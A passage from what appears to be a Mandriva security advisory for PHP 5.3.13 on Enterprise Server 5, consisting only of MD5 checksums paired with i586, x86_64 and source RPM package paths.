mes5/i586/php-fam-5.0.1-3.6mdvmes5.2.i586.rpm\r\n 1ef9b6263948c34f46b5fd29321d911c mes5/i586/php-fileinfo-5.3.13-0.1mdvmes5.2.i586.rpm\r\n aad86d693bbe62bba0942b370f6ca246 mes5/i586/php-filepro-5.1.6-13.6mdvmes5.2.i586.rpm\r\n 3868021d3e61c00b8ae6809bb7c0900b mes5/i586/php-filter-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 48b88e31e42379400dc7766ad2c62e5a mes5/i586/php-fpm-5.3.13-0.1mdvmes5.2.i586.rpm\r\n f8cd704030d7d70ea8ebe8346f9f0e0f mes5/i586/php-ftp-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 7c32f002b04ac8072df7aa7fa8b7a8e6 mes5/i586/php-gd-5.3.13-0.1mdvmes5.2.i586.rpm\r\n df5a2a2b26101a778494b26af67766a2 mes5/i586/php-gettext-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 8327f44ffa0b41841ff9b71039017d52 mes5/i586/php-gmp-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 811259cfad20fd63253a7123b7fd27dc mes5/i586/php-gtk2-2.0.1-2.2mdvmes5.2.i586.rpm\r\n be58ace4d69b596b57afd068f7cf3c49 mes5/i586/php-hash-5.3.13-0.1mdvmes5.2.i586.rpm\r\n a17c44ceea8b3f5a0bc55a3af3474af3 mes5/i586/php-iconv-5.3.13-0.1mdvmes5.2.i586.rpm\r\n c89f28160eaf77c3655965bfbed6c3b1 mes5/i586/php-imagick-3.0.1-0.2mdvmes5.2.i586.rpm\r\n 73fa2e549e58fd68ad8a9109c77a7369 mes5/i586/php-imap-5.3.13-0.1mdvmes5.2.i586.rpm\r\n b3c413082301b0a8f4a25f176a87a45e mes5/i586/php-ini-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 6c775dd0ca5396b0ebb70e602db834b6 mes5/i586/php-intl-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 5902f72d9bc4f0c025618cd49e5f8e79 mes5/i586/php-json-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 877dc6caffd8bbe76c654ac4a9d18daa mes5/i586/php-ldap-5.3.13-0.1mdvmes5.2.i586.rpm\r\n abe1393ef623af8944406dadd8064c89 mes5/i586/php-mailparse-2.1.6-0.1mdvmes5.2.i586.rpm\r\n 0f498f237e44a451224929ecd24b315c mes5/i586/php-mbstring-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 35eceb3b8e39847fa00a91409afe9407 mes5/i586/php-mcal-0.6-23.6mdvmes5.2.i586.rpm\r\n 385e71ffb5612c05a701ed557e556c62 mes5/i586/php-mcrypt-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 18e3385588deda52c3516375d6d803d0 mes5/i586/php-mcve-7.0.3-0.2mdvmes5.2.i586.rpm\r\n daf72900f0a90864046a67a2d71e6caa mes5/i586/php-mdbtools-1.0.0-4.2mdvmes5.2.i586.rpm\r\n d0905f31f721643a572bf6b005262bf6 mes5/i586/php-memcache-3.0.6-0.2mdvmes5.2.i586.rpm\r\n 6b5378f95fb1022c83d34c9db1422d8e mes5/i586/php-ming-5.2.10-0.2mdvmes5.2.i586.rpm\r\n 8e6e4f7017a0febfef7cdf155ecc4962 mes5/i586/php-mssql-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 0411daf7561b179eb5a8e484d36f4ad3 mes5/i586/php-mysql-5.3.13-0.1mdvmes5.2.i586.rpm\r\n ff31716a2c412fba2e9d013c56965cf7 mes5/i586/php-mysqli-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 993a888b1c2713a00565e45282b23148 mes5/i586/php-mysqlnd-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 08fbe9fae6d67c0637041c80f07eba12 mes5/i586/php-odbc-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 7a29e566a7751e1821a623a4f0018a6f mes5/i586/php-openssl-5.3.13-0.1mdvmes5.2.i586.rpm\r\n f441f06ada4ee980d501e2b6576f2806 mes5/i586/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.i586.rpm\r\n b8da69bd634b1daa981efbc2ed95a648 mes5/i586/php-pcntl-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 95089b116c79922e497d4fd7854df544 mes5/i586/php-pdo-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 2f2196f900c6b802cf7fea375c9eeb91 mes5/i586/php-pdo_dblib-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 25c438a18c01c09b60e7c7b2fe13671f mes5/i586/php-pdo_mysql-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 91f1fee5243ed4ae8398a75e9114adac mes5/i586/php-pdo_odbc-5.3.13-0.1mdvmes5.2.i586.rpm\r\n bfff4547a91207f42302cd9fc184f86f mes5/i586/php-pdo_pgsql-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 8d460754542459d816d1b3dff39c872b mes5/i586/php-pdo_sqlite-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 9ff947c66182403b9888b265832c9161 mes5/i586/php-perl-1.0.0-32.2mdvmes5.2.i586.rpm\r\n cb1bca793338e4e792ab6c8792293617 mes5/i586/php-pgsql-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 1ef789ec5d683fef4934fc57101456b1 mes5/i586/php-phar-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 52145842d6faa93fa073fa17cb3b0763 mes5/i586/php-posix-5.3.13-0.1mdvmes5.2.i586.rpm\r\n aed79d1522b7507df309ddd682a99b4d mes5/i586/php-pspell-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 7cf0cf423041e29370ec6df0da70d21e mes5/i586/php-radius-1.2.5-7.2mdvmes5.2.i586.rpm\r\n f53c0be9c38ddf42a8c6820a312eaa06 mes5/i586/php-readline-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 29ee9c49f78cb11e83f9a251bd02b7e9 mes5/i586/php-recode-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 2c8c33fd81fc8468d0ddb774c2814264 mes5/i586/php-sasl-0.1.0-21.6mdvmes5.2.i586.rpm\r\n 8c2471fa96a43e94edabd4b9668724ef mes5/i586/php-session-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 3ca8b754f64883be1924fa8e95e799d3 mes5/i586/php-shmop-5.3.13-0.1mdvmes5.2.i586.rpm\r\n faa1b493b705f393754abcc2174857b5 mes5/i586/php-snmp-5.3.13-0.1mdvmes5.2.i586.rpm\r\n c393eb8db265798b1beff2541d13ee25 mes5/i586/php-soap-5.3.13-0.1mdvmes5.2.i586.rpm\r\n c23958451e7f49cb90e18f0d58fde045 mes5/i586/php-sockets-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 419a7ecf0f1d44a08795cc21c88f3b17 mes5/i586/php-sphinx-1.2.0-0.1mdvmes5.2.i586.rpm\r\n b42c41d30364c4bb308146ab5087fabf mes5/i586/php-sqlite3-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 6e9609d6fd4724426a63e3e520341051 mes5/i586/php-sqlite-5.3.13-0.1mdvmes5.2.i586.rpm\r\n e0b0e03c3ba4746805a70f3749784af7 mes5/i586/php-ssh2-0.11.3-0.1mdvmes5.2.i586.rpm\r\n f3be55d6857f3c36f063a418ff780c01 mes5/i586/php-suhosin-0.9.33-0.1mdvmes5.2.i586.rpm\r\n 49ab75a66171482bc0c92da727b42790 mes5/i586/php-sybase_ct-5.3.13-0.1mdvmes5.2.i586.rpm\r\n a49fe633e4d2eb4acb1fcd9ded4afff6 mes5/i586/php-sysvmsg-5.3.13-0.1mdvmes5.2.i586.rpm\r\n e548f18c2ccd5522376387fb9895e605 mes5/i586/php-sysvsem-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 079ffcc8e9bbcf02d70b39aed0e37510 mes5/i586/php-sysvshm-5.3.13-0.1mdvmes5.2.i586.rpm\r\n a0bfac8555bfaefec8cdab4a8fe8f759 mes5/i586/php-tclink-3.4.5-0.2mdvmes5.2.i586.rpm\r\n c3bb9c496c70fa477b65a326f10f1f13 mes5/i586/php-tidy-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 92fa5b22a77b38c94e1e81cee27e94e5 mes5/i586/php-timezonedb-2012.3-0.1mdvmes5.2.i586.rpm\r\n c69e34969e6be01c229701cb3bd381f3 mes5/i586/php-tokenizer-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 86d0fa4af4c00f2a996ee86c7480eaec mes5/i586/php-translit-0.6.1-0.1mdvmes5.2.i586.rpm\r\n 11aa119fde6b2c43e93259784d78b72a mes5/i586/php-vld-0.11.1-0.1mdvmes5.2.i586.rpm\r\n f48532222388b41b6f5abbeffa704cf9 mes5/i586/php-wddx-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 1770351942d2fb1c5685afe0609d22ea mes5/i586/php-xattr-1.1.0-2.6mdvmes5.2.i586.rpm\r\n 09300dd1170f00c70d05a21017d05448 mes5/i586/php-xcache-1.3.2-0.1mdvmes5.2.i586.rpm\r\n 508c5edb557c8bc20d7084b314278944 mes5/i586/php-xcache-admin-1.3.2-0.1mdvmes5.2.i586.rpm\r\n 41e91f88a9fdaf1fa0420ae01dc46ade mes5/i586/php-xdebug-2.1.4-0.1mdvmes5.2.i586.rpm\r\n c8d6da8bdb753cf7a2a6db3d3e2e46bf mes5/i586/php-xml-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 50aed2d093b83fdaa77dc407da9b861a mes5/i586/php-xmlreader-5.3.13-0.1mdvmes5.2.i586.rpm\r\n fe32252d37699afb0c51f60f9722adcb mes5/i586/php-xmlrpc-5.3.13-0.1mdvmes5.2.i586.rpm\r\n a1a2181cb93d31acf2c6b6e246b9db0d mes5/i586/php-xmlwriter-5.3.13-0.1mdvmes5.2.i586.rpm\r\n f87097cce5a501146df0e7120211c4bd mes5/i586/php-xsl-5.3.13-0.1mdvmes5.2.i586.rpm\r\n 9d5c99b04a85caea9bce01f4c662372c mes5/i586/php-yaz-1.1.1-0.1mdvmes5.2.i586.rpm\r\n d38eb4445d09878793e8506f1b649236 mes5/i586/php-zip-5.3.13-0.1mdvmes5.2.i586.rpm\r\n ec0cbe2b90c8fb0db9939d10e62fef02 mes5/i586/php-zlib-5.3.13-0.1mdvmes5.2.i586.rpm\r\n e2fe6c46edade8b149063316fb6e9268 mes5/i586/python-SWF-0.4.4-0.1mdvmes5.2.i586.rpm\r\n aef4719c148c3f6edf549f236a08868e mes5/i586/sphinx-0.9.9-0.1mdvmes5.2.i586.rpm\r\n 48b1928235704dd977b9fdc25f1e2933 mes5/i586/stemwords-0-5.1mdvmes5.2.i586.rpm\r\n 1b7636ca4c1ec6eac492041c6e9c95e2 mes5/i586/yaz-3.0.48-0.1mdvmes5.2.i586.rpm \r\n 2bac0388ad669fc836a910cb6919733e mes5/SRPMS/apache-mod_php-5.3.13-0.1mdvmes5.2.src.rpm\r\n 0dd8c597a6a39e17b504408fa4f894d1 mes5/SRPMS/lemon-3.7.4-0.1mdvmes5.2.src.rpm\r\n 04a50458044ddef8dca4acbecd0555d1 mes5/SRPMS/libmbfl-1.1.0-0.1mdvmes5.2.src.rpm\r\n d9e473396af964f01dd6310844925396 mes5/SRPMS/libmonetra-7.0.4-0.1mdvmes5.2.src.rpm\r\n 0fafe53fccc11afa4b75c66dc49261cd mes5/SRPMS/libstemmer-0-5.1mdvmes5.2.src.rpm\r\n 6de1878b7ff4fbc0b63e381618e966ba mes5/SRPMS/ming-0.4.4-0.1mdvmes5.2.src.rpm\r\n c4041cade9aaf6c4c67f046e4bfbaa74 mes5/SRPMS/php-5.3.13-0.1mdvmes5.2.src.rpm\r\n c0a1c69bca172f69a034505cfd6b37fc mes5/SRPMS/php-apc-3.1.10-0.1mdvmes5.2.src.rpm\r\n df8c3520a450cb4209179f60cf8828cd mes5/SRPMS/php-dbx-1.1.0-30.2mdvmes5.2.src.rpm\r\n 7705d28806c6a73a9e588d174203ec11 mes5/SRPMS/php-dio-0.0.5-0.1mdvmes5.2.src.rpm\r\n cb9fd58d04a1db3ceec2f9b15c5ddac0 mes5/SRPMS/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.src.rpm\r\n d1e7c7da449372f62c27a0cd3eeb8a8d mes5/SRPMS/php-fam-5.0.1-3.6mdvmes5.2.src.rpm\r\n 4c10d297abc9ea2a4dfe2cc441be619c mes5/SRPMS/php-filepro-5.1.6-13.6mdvmes5.2.src.rpm\r\n 7c30fe50ac1dc23870c64660300e78f8 mes5/SRPMS/php-gtk2-2.0.1-2.2mdvmes5.2.src.rpm\r\n ecdbedc8c745921ab7e8c97850c7e976 mes5/SRPMS/php-imagick-3.0.1-0.2mdvmes5.2.src.rpm\r\n c31069ae710a67783a81adf905f72842 mes5/SRPMS/php-ini-5.3.13-0.1mdvmes5.2.src.rpm\r\n 7bba5d67278539bbfe8980f4619fc443 mes5/SRPMS/php-mailparse-2.1.6-0.1mdvmes5.2.src.rpm\r\n c064fa5008b99634cf43dd8cfcfc38a8 mes5/SRPMS/php-mcal-0.6-23.6mdvmes5.2.src.rpm\r\n 4dc1c969e13503b5b84e4cc2a62fcafa mes5/SRPMS/php-mcve-7.0.3-0.2mdvmes5.2.src.rpm\r\n 8a0b00a7eb45735c7f1b84db2124a02a mes5/SRPMS/php-mdbtools-1.0.0-4.2mdvmes5.2.src.rpm\r\n 50514e567296ef853fc9c040b27fde14 mes5/SRPMS/php-memcache-3.0.6-0.2mdvmes5.2.src.rpm\r\n 3d68803bc8d4d5db837d034e31b559ab mes5/SRPMS/php-ming-5.2.10-0.2mdvmes5.2.src.rpm\r\n 3788a033464659c7697271fe3e11cb6b mes5/SRPMS/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.src.rpm\r\n 4e41590da9fd097f6ecb0cf362bf99f9 mes5/SRPMS/php-perl-1.0.0-32.2mdvmes5.2.src.rpm\r\n 8227db814a6322c4a1c72717965be834 mes5/SRPMS/php-radius-1.2.5-7.2mdvmes5.2.src.rpm\r\n b6eea216f82a274151c12bb38e50793c mes5/SRPMS/php-sasl-0.1.0-21.6mdvmes5.2.src.rpm\r\n aefb4d8a934bd9ecf18f10cf94508b21 mes5/SRPMS/php-sphinx-1.2.0-0.1mdvmes5.2.src.rpm\r\n 27acc20ae9792b5ee79127428c76d019 mes5/SRPMS/php-ssh2-0.11.3-0.1mdvmes5.2.src.rpm\r\n 8561139b4f53146b52d0d881c93bd884 mes5/SRPMS/php-suhosin-0.9.33-0.1mdvmes5.2.src.rpm\r\n 9decd2138202b8f51428b69f8d089679 mes5/SRPMS/php-tclink-3.4.5-0.2mdvmes5.2.src.rpm\r\n a331ac0e06665fb2b1696eeb35ddd67b mes5/SRPMS/php-timezonedb-2012.3-0.1mdvmes5.2.src.rpm\r\n 79c414525991c894f01d9e597cda78f6 mes5/SRPMS/php-translit-0.6.1-0.1mdvmes5.2.src.rpm\r\n 93897f5b7d60138c9e12474dc8388954 mes5/SRPMS/php-vld-0.11.1-0.1mdvmes5.2.src.rpm\r\n 9f2b8c72495c63762e02a4792b321463 mes5/SRPMS/php-xattr-1.1.0-2.6mdvmes5.2.src.rpm\r\n bec964b1764e87c0ba2d78ec3c33f662 mes5/SRPMS/php-xcache-1.3.2-0.1mdvmes5.2.src.rpm\r\n 6e3b637199e13bd895401f2cadbf25c5 mes5/SRPMS/php-xdebug-2.1.4-0.1mdvmes5.2.src.rpm\r\n 7b1f065bc086533fa01adba07235c4fe mes5/SRPMS/php-yaz-1.1.1-0.1mdvmes5.2.src.rpm\r\n 51586ceaba69e3a61e4171c1b33821ad mes5/SRPMS/sphinx-0.9.9-0.1mdvmes5.2.src.rpm\r\n fb8632c3872b5f62b8fdc070565d21b6 mes5/SRPMS/xmlrpc-epi-0.54-0.1mdvmes5.2.src.rpm\r\n 7737d7193bce052e26930d49ee7e841f mes5/SRPMS/yaz-3.0.48-0.1mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n 96b2d5df095de56795b5e402b5615e5a mes5/x86_64/apache-mod_php-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 03641ff5a502b304b0cbdeff4161f07a mes5/x86_64/lemon-3.7.4-0.1mdvmes5.2.x86_64.rpm\r\n 16d5aee91aab749c674b146725679edf mes5/x86_64/lib64mbfl1-1.1.0-0.1mdvmes5.2.x86_64.rpm\r\n 211cf3c8c54d7135c1c59d37df63dbd9 mes5/x86_64/lib64mbfl-devel-1.1.0-0.1mdvmes5.2.x86_64.rpm\r\n ff17fd8f9ad24289e558636ce26d6e17 mes5/x86_64/lib64ming1-0.4.4-0.1mdvmes5.2.x86_64.rpm\r\n 84acf50087747dcb4f34a5aa2ea1ce0a mes5/x86_64/lib64ming-devel-0.4.4-0.1mdvmes5.2.x86_64.rpm\r\n db2510f25a007023647f235013ec6e74 mes5/x86_64/lib64monetra7-7.0.4-0.1mdvmes5.2.x86_64.rpm\r\n e449abc214208571c14827a9319c0ec3 mes5/x86_64/lib64monetra-devel-7.0.4-0.1mdvmes5.2.x86_64.rpm\r\n 7a418a728839573bca2187e8c5468fe2 mes5/x86_64/lib64php5_common5-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 4060a9ea3f85ea3df9260575783e7a17 mes5/x86_64/lib64sphinxclient0-0.9.9-0.1mdvmes5.2.x86_64.rpm\r\n f6ca93737988ebae403ef0ed8ab41359 mes5/x86_64/lib64sphinxclient-devel-0.9.9-0.1mdvmes5.2.x86_64.rpm\r\n 4a7ef9bd46d3c4e8e36f08868319244d mes5/x86_64/lib64stemmer0-0-5.1mdvmes5.2.x86_64.rpm\r\n b15fe53cc1c6ea59fdd82c04eae8e7fd mes5/x86_64/lib64stemmer-devel-0-5.1mdvmes5.2.x86_64.rpm\r\n c673964b2561e44781a98cb86a9e3187 mes5/x86_64/lib64xmlrpc-epi0-0.54-0.1mdvmes5.2.x86_64.rpm\r\n e66b903dc4310d0d3849689529146ec3 mes5/x86_64/lib64xmlrpc-epi-devel-0.54-0.1mdvmes5.2.x86_64.rpm\r\n 49cbe05c0d48ad378bd129ebd036ba26 mes5/x86_64/lib64yaz3-3.0.48-0.1mdvmes5.2.x86_64.rpm\r\n 2afb044886e1c96c3db29bdf0bb7dc9b mes5/x86_64/lib64yaz-devel-3.0.48-0.1mdvmes5.2.x86_64.rpm\r\n 2f4b0caff3c9e97839df3aa1ad6ca732 mes5/x86_64/ming-utils-0.4.4-0.1mdvmes5.2.x86_64.rpm\r\n f288571bd192a5e5802a40cd7d4e3118 mes5/x86_64/perl-SWF-0.4.4-0.1mdvmes5.2.x86_64.rpm\r\n b059dbc18e76476659494969ef5e4947 mes5/x86_64/php-apc-3.1.10-0.1mdvmes5.2.x86_64.rpm\r\n 68149e7e29a2e2ea3f7d7e3573bd193b mes5/x86_64/php-apc-admin-3.1.10-0.1mdvmes5.2.x86_64.rpm\r\n e38d895cf490704f5e6f8b1ecdca7e61 mes5/x86_64/php-bcmath-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 711815bad3794350d9177d52bac8d95b mes5/x86_64/php-bz2-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 3e8c4f72f0211a797a172c7092966a46 mes5/x86_64/php-calendar-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 51026f5c6c789d4fe07bb64f5c2a4559 mes5/x86_64/php-cgi-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n a5c4c236c80e4219e0a8e29eac78b440 mes5/x86_64/php-cli-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n f7d68cdc91a5d1aca630bf5d2cc027a8 mes5/x86_64/php-ctype-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 1e82cf4c1d05409239f773c27f25e148 mes5/x86_64/php-curl-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 4414697431b4f9d8347d368406a74792 mes5/x86_64/php-dba-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 78a159ea14c942e6b1484d7f7a02430f mes5/x86_64/php-dbx-1.1.0-30.2mdvmes5.2.x86_64.rpm\r\n afce38f700de1511605177aaac2a4b0c mes5/x86_64/php-devel-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 24c2440bccc5cdceb6d9c6eb6fbd8fb6 mes5/x86_64/php-dio-0.0.5-0.1mdvmes5.2.x86_64.rpm\r\n e304390a900576e6344b831935fca984 mes5/x86_64/php-doc-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 41d2f61596375aa03dcd64462432b8ad mes5/x86_64/php-dom-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 84eead8c2a272ed05ef0a8f3b6672f56 mes5/x86_64/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.x86_64.rpm\r\n d72cfcdee8d186ad859b3b99fd70bdd0 mes5/x86_64/php-eaccelerator-admin-0.9.6.1-0.6mdvmes5.2.x86_64.rpm\r\n e3b9b291bbc15d61895e27372b8b1925 mes5/x86_64/php-enchant-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 558cd9c98631858a661a6aa4ccdf882b mes5/x86_64/php-exif-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 3553939609e3fef1652ee999d37fd530 mes5/x86_64/php-fam-5.0.1-3.6mdvmes5.2.x86_64.rpm\r\n 5a19e0b3fc58299ccdb1b12f5ca69200 mes5/x86_64/php-fileinfo-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 8a23bbc3e8c9ef45a339563075668d59 mes5/x86_64/php-filepro-5.1.6-13.6mdvmes5.2.x86_64.rpm\r\n 78be28f1fee69306797aa83a91bee75b mes5/x86_64/php-filter-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n f8339f10b4664c2130f1159f89c0b244 mes5/x86_64/php-fpm-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n d3b287afef7b1f6207082e97ae77b349 mes5/x86_64/php-ftp-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 98f68dcc439e4252d72be221fe1e9b98 mes5/x86_64/php-gd-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 0d04cfba60b215c27a87d77a363a51e9 mes5/x86_64/php-gettext-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n f95a838116143b396aedeeb01c534584 mes5/x86_64/php-gmp-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n e84018d144e7f94e436132420d51440d mes5/x86_64/php-gtk2-2.0.1-2.2mdvmes5.2.x86_64.rpm\r\n 7e02ce03f990c677fd39095d094bf5fc mes5/x86_64/php-hash-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 9e3ae7e6d67397fc15a81d3b3e7d30c8 mes5/x86_64/php-iconv-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 76155d4adcfb84852c193a6a9183a701 mes5/x86_64/php-imagick-3.0.1-0.2mdvmes5.2.x86_64.rpm\r\n 6c1aa64a78fef0ba6b12de5c7fdf227e mes5/x86_64/php-imap-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n e9dbcfb8b6330f52ea6f83630e0b96db mes5/x86_64/php-ini-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n a99ae1adc279e1446501374b396e9194 mes5/x86_64/php-intl-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n c4856a889eb1fabe4cfb4e7e0541a208 mes5/x86_64/php-json-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 1e6ed1c6f514d3bed9271e192d6b8c79 mes5/x86_64/php-ldap-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 23d141eeb5ec49b7bd14931e313efe61 mes5/x86_64/php-mailparse-2.1.6-0.1mdvmes5.2.x86_64.rpm\r\n 67df3a26f6e25258bb28b9d70ebdc7b9 mes5/x86_64/php-mbstring-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n ce6ec0bd9bf2c6bbea51b670566cf125 mes5/x86_64/php-mcal-0.6-23.6mdvmes5.2.x86_64.rpm\r\n 3af3a06df5a30d2324b42ce38b0170c7 mes5/x86_64/php-mcrypt-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 898c0ff97086e4003f34c5af21a1209b mes5/x86_64/php-mcve-7.0.3-0.2mdvmes5.2.x86_64.rpm\r\n ea3c678599dd676b1596cf9b38bac5fa mes5/x86_64/php-mdbtools-1.0.0-4.2mdvmes5.2.x86_64.rpm\r\n f42a0499caae118ccb02a404fe853e8d mes5/x86_64/php-memcache-3.0.6-0.2mdvmes5.2.x86_64.rpm\r\n d656bf501e02bf270c74e621655e0f79 mes5/x86_64/php-ming-5.2.10-0.2mdvmes5.2.x86_64.rpm\r\n 67182e137d6799e21d1eb95f8e8a09a6 mes5/x86_64/php-mssql-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 13b16b807e73dc799f820ec360b4c4c4 mes5/x86_64/php-mysql-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 401bf41f8ae42e1c5cbae844b5859310 mes5/x86_64/php-mysqli-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n a3d71aca0b59a479be67aa5f7e2dadac mes5/x86_64/php-mysqlnd-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 299a5af759216cc02b72c73e1aedb898 mes5/x86_64/php-odbc-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 1b9afd33db663c3c0376e9e366a1d7e9 mes5/x86_64/php-openssl-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 1bfa8188adf02eefd1fee6980bf8a637 mes5/x86_64/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.x86_64.rpm\r\n 4ea6deefc1d6c98165a39bf0cbbb1e68 mes5/x86_64/php-pcntl-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n e8edc47c4535c7185c648fe2cdd62fd3 mes5/x86_64/php-pdo-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 7de9187f26e2b1dcbde7bfa6b5e72cc3 mes5/x86_64/php-pdo_dblib-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 43c1dabc4e916f1676a64affa4e71923 mes5/x86_64/php-pdo_mysql-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 90e7bb6c5edceae816e1efc1d772c1cd mes5/x86_64/php-pdo_odbc-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 41c159cea72f2c8608422dd60b24a2aa mes5/x86_64/php-pdo_pgsql-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 3b806d521833732f44d199760894e6cc mes5/x86_64/php-pdo_sqlite-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n e3047e894435230a2234b6c106e7f85b mes5/x86_64/php-perl-1.0.0-32.2mdvmes5.2.x86_64.rpm\r\n 13e2506c835e395eb7f81edac6b61a8f mes5/x86_64/php-pgsql-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n dab84434950d74f298b66066fc5d22b2 mes5/x86_64/php-phar-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n c087bf52f652c59da6bdd4fb06286464 mes5/x86_64/php-posix-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 29d9820c941b281ec4bf2e1ae154b590 mes5/x86_64/php-pspell-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 2a5472038518e78b1e77c085486a7f41 mes5/x86_64/php-radius-1.2.5-7.2mdvmes5.2.x86_64.rpm\r\n ef96d7846f36e03abbe0389a9c7025a6 mes5/x86_64/php-readline-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 3d6dc5bbe9f83a3b7379b09842418d6d mes5/x86_64/php-recode-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n fe9478b8ef31ffd03c4fd7e3b13a6fcd mes5/x86_64/php-sasl-0.1.0-21.6mdvmes5.2.x86_64.rpm\r\n 66ea22c633fb484f787795c541c31458 mes5/x86_64/php-session-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 73cf8b14818d6c4aa6ff7b4f876a305f mes5/x86_64/php-shmop-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 2f1c10a3e69bc4962c68da8494d7a2d1 mes5/x86_64/php-snmp-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 66bf34f4665ce04daf5962c4c5178966 mes5/x86_64/php-soap-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n d9f0deeb70efb200c65be5ba2cbfe197 mes5/x86_64/php-sockets-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n cb5ace43e37f4488ca65e4740495842a mes5/x86_64/php-sphinx-1.2.0-0.1mdvmes5.2.x86_64.rpm\r\n d2347f18673adf71d3fdc94600e6ec77 mes5/x86_64/php-sqlite3-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 5317fd6819706540ee1d1e209b0ee65d mes5/x86_64/php-sqlite-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n e308fc3349779514b7aa1e336452f539 mes5/x86_64/php-ssh2-0.11.3-0.1mdvmes5.2.x86_64.rpm\r\n c60c35039cdf4a3446e29d0dfa96bc40 mes5/x86_64/php-suhosin-0.9.33-0.1mdvmes5.2.x86_64.rpm\r\n 3076e178dff5d37d8c44f21e00d63c9e mes5/x86_64/php-sybase_ct-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n e268581c1bbbd9269faa591577fce62a mes5/x86_64/php-sysvmsg-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 7dbc04b5fc2ffee323f2c4123feb05bd mes5/x86_64/php-sysvsem-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 1bdffd99b577b97adc67e5b20df0b301 mes5/x86_64/php-sysvshm-5.3.13-0.1mdvmes5.2.x86_64.rpm\r\n 